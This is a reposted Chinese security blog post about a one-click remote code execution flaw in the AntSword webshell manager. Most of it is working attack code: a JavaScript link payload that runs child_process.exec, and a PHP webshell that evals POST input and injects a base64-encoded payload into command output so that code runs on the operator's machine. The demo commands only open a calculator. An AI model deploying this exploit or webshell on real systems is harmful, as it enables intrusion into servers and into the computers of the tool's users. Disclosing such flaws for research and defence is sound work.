文章总结： 文档披露蚁剑（AntSword）远程管理工具存在1-clickRCE漏洞，攻击者可通过构造恶意JavaScript载荷在目标系统上执行任意命令。文章提供了针对Windows和macOS系统的POC示例（如执行calc.exe或打开计算器），并给出利用代码实现命令注入的具体方法。关键发现表明该漏洞无需复杂交互即可直接获取系统权限，建议用户立即升级版本或禁用相关功能模块以缓解风险。 综合评分： 85 文章分类： 漏洞分析,WEB安全,红队,渗透测试,安全工具

蚁剑爆出1click rce，执行命令即可上线

原创

秋风 秋风

秋风的安全之路

2026年4月27日 15:38 广东

在小说阅读器读本章

去阅读

参考：https://github.com/AntSwordProject/antSword/issues/370

POC：

[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]

exp:

$pass = 'test';if (!isset($_POST[$pass])) {    http_response_code(404);    exit;}
$code = $_POST[$pass];
if (!function_exists('get_magic_quotes_gpc')) {    function get_magic_quotes_gpc() { return 0; }}
$payload = '[[!;;;;javascript:void(require(`child_process`).exec(`open -a Calculator`))]{Click here for phpMyAdmin}]';$b64payload = base64_encode("\n" . $payload);$inject = 'echo base64_decode("' . $b64payload . '");';
// 只在终端命令请求时注入 (包含 system/exec/passthru/popen 等命令执行函数)if (preg_match('/\bsystem\b|\bexec\b|\bpassthru\b|\bpopen\b|\bshell_exec\b|\bproc_open\b/', $code)) {    $code = str_replace('asoutput();', $inject . 'asoutput();', $code);}
@eval($code);

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：秋风的安全之路 秋风 秋风《蚁剑爆出1click rce，执行命令即可上线》